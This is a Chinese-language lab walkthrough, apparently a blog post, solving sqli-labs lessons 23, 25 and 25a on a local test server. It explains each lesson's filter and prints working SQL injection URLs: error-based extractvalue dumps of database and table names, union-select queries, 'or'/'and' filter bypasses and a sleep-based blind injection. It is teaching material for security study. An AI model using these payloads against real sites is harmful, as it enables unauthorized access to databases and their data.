LESS-23
源码:
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190330211520492.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
![在这里插入图片描述](https://img-blog.csdnimg.cn/2019033021153351.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
以此可知可以通过报错注入等方式
语法:
mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int KaTeX parse error: Expected 'EOF', got '&' at position 19: …it = -1 [, int &̲count ]] )
搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。
故注释符都被替换掉了,故不可以用注释符号注释掉引号后面的。只能在多加一个单引号闭合后面的一个单引号。
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190330211605883.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
由错误提示也可知id的闭合方式为单引号闭合
输入:
http://127.0.0.1/sqlilabs/Less-23/?id=1’and extractvalue(1,concat(0x7e,(select database()),0x7e)) or’1’='1![在这里插入图片描述](https://img-blog.csdnimg.cn/20190330211653100.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
语法:Subquery returns more than 1 row : 子查询返回值不唯一,意思是必须唯一才正确。(这里出现错误的原因是因为concat无法连接超过一行的语句,所以还没到limit前就在concat出现报错)
输入:
http://127.0.0.1/sqlilabs/Less-23/?id=-1’ and extractvalue (1,concat(0x7e,(select table_name from information_schema.tables where table_schema=”security” ),0x7e)) or ’1’=’1
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190330211711288.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
输入:
http://127.0.0.1/sqlilabs/Less-23/?id=-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema= 'security '),'3
语法:group_concat(str1,str2,…)——连接一个组的所有字符串,并以逗号分隔每一条数据,使之成为一行。要用union要保证两端查询行数相同。
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190330211721740.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
输入:
http://127.0.0.1/sqlilabs/Less-23/?id=1’ and extractvalue (1,concat(0x7e,(select table_name from information_schema.tables where table_schema=’security’),0x7e)) or’1’=’1![在这里插入图片描述](https://img-blog.csdnimg.cn/20190330211741252.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
改错:加了:limit 0,1(在查询语句中):
http://127.0.0.1/sqlilabs/Less-23/?id=1 ‘and extractvalue (1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit%200,1),0x7e)) or’1’='1![在这里插入图片描述](https://img-blog.csdnimg.cn/20190330211752596.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
另一种改错方法:http://127.0.0.1/sqlilabs/Less-23/?id=1’ and extractvalue (1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e))%20or%20%271%27=%271![在这里插入图片描述](https://img-blog.csdnimg.cn/20190330211842882.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
http://127.0.0.1/sqlilabs/Less-23/? id=1’ and extractvalue (1,concat(0x7e,(select table_name from information_schema.tables where table_schema=’security’ limit 0,1),0x7e))or ‘1’=’1![在这里插入图片描述](https://img-blog.csdnimg.cn/20190330211901919.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
LESS-25
源码:![在这里插入图片描述](https://img-blog.csdnimg.cn/20190330211951972.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190330211958726.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
由此可见本关过滤的是or和AND,当然也可以用union语句
解决方案
1)大小写变形 Or,OR,oR
2)编码,hex,urlencode
3)添加注释/or/
4)利用符号 and=&& or=||(但是&&需要使用url编码为%26%26 ,因为&在url中往往后面接参数,web服务器会将&后面的当成另一个参数)
5)也可用oorr这样过滤后一个还保留一个
输入:?id=1’ || extractvalue(1,concat(0x7e,(select database()),0x7e))–+![在这里插入图片描述](https://img-blog.csdnimg.cn/201903302120228.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
输入:
http://127.0.0.1/sqlilabs/Less-25/?id=1’ %26%26 extractvalue(1,concat(0x7e,(select database()),0x7e))–+
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190330212046954.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
输入:?id=-1’ union select 1,(select database()),3–+![在这里插入图片描述](https://img-blog.csdnimg.cn/2019033021205585.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
输入:http://127.0.0.1/sqlilabs/Less-25/?id=-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=’security’),3–+
出现错误的原因,information中的or被过滤了
LESS-25a
不同于 25 关的是 sql 语句中对于 id,没有’’的包含,同时没有输出错误项,报错注入不能用。其余基本上和 25 示例没有差别。此处采取两种方式:延时注入和联合注入。
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190330212218869.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
联合注入:
http://127.0.0.1/sqlilabs/Less-25a/?id=-1 union select 1,(select database()),3–+![在这里插入图片描述](https://img-blog.csdnimg.cn/20190330212230151.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)
延时注入:
http://127.0.0.1/sqlilabs/Less-25a/?id=-1 || if(ascii(substr(database(),1,1))=115,1,sleep(5))–+![在这里插入图片描述](https://img-blog.csdnimg.cn/20190330212249400.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0NTk4Mzk3,size_16,color_FFFFFF,t_70)